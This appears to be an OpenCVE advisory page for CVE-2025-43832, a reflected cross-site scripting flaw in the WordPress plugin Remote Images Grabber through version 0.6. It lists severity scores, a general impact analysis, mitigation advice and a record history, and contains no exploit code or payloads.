Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber remote-images-grabber allows Reflected XSS.This issue affects Remote Images Grabber: from n/a through <= 0.6.
Published: 2025-05-19
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Remote Images Grabber allows an attacker to inject scripts into the HTML page that is served to the visitor. The vulnerability arises from the plugin failing to escape user input when generating the page, which can result in an attacker executing arbitrary JavaScript in a visitor’s browser. This can compromise the victim’s session, steal credentials, or perform other malicious actions on the user’s behalf.

Affected Systems

The flaw affects the WordPress plugin Remote Images Grabber shipped by the vendor andreyk. Any site running this plugin with a version through 0.6 (inclusive) is vulnerable. The CVE documentation does not list a baseline or minimum affected version, so all versions up to and including 0.6 are considered susceptible.

Risk and Exploitability

The CVSS score of 7.1 indicates a high severity, but the EPSS score of less than 1% signals that exploitation is currently unlikely to occur in the wild. The vulnerability is not listed in the CISA KEV catalog. It is most likely exploited by sending a crafted request that includes malicious parameters, causing the plugin to reflect the input verbatim in the response. The attacker would need the victim to visit a page that includes this reflected input in order for the malicious script to execute.

Generated by OpenCVE AI on April 30, 2026 at 19:36 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Remote Images Grabber to the newest version that removes the XSS flaw
  • If an update cannot be obtained, disable the plugin entirely until a fix is released
  • Apply a Content Security Policy on the WordPress site that restricts execution of scripts from untrusted origins

Generated by OpenCVE AI on April 30, 2026 at 19:36 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
EUVD EUVD EUVD-2025-15754 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber allows Reflected XSS.This issue affects Remote Images Grabber: from n/a through 0.6.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Wed, 01 Apr 2026 23:45:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber allows Reflected XSS.This issue affects Remote Images Grabber: from n/a through 0.6. Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber remote-images-grabber allows Reflected XSS.This issue affects Remote Images Grabber: from n/a through <= 0.6.
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Mon, 19 May 2025 22:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 19 May 2025 19:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber allows Reflected XSS.This issue affects Remote Images Grabber: from n/a through 0.6.
Title WordPress Remote Images Grabber plugin <= 0.6 - Reflected Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}

Subscriptions

Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:35.929Z

Reserved: 2025-04-17T17:03:58.444Z

Link: CVE-2025-43832

cve-icon Vulnrichment

Updated: 2025-05-19T21:14:30.143Z

cve-icon NVD

Status : Deferred

Published: 2025-05-19T19:15:50.560

Modified: 2026-04-23T15:29:52.840

Link: CVE-2025-43832

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-30T19:45:26Z

Weaknesses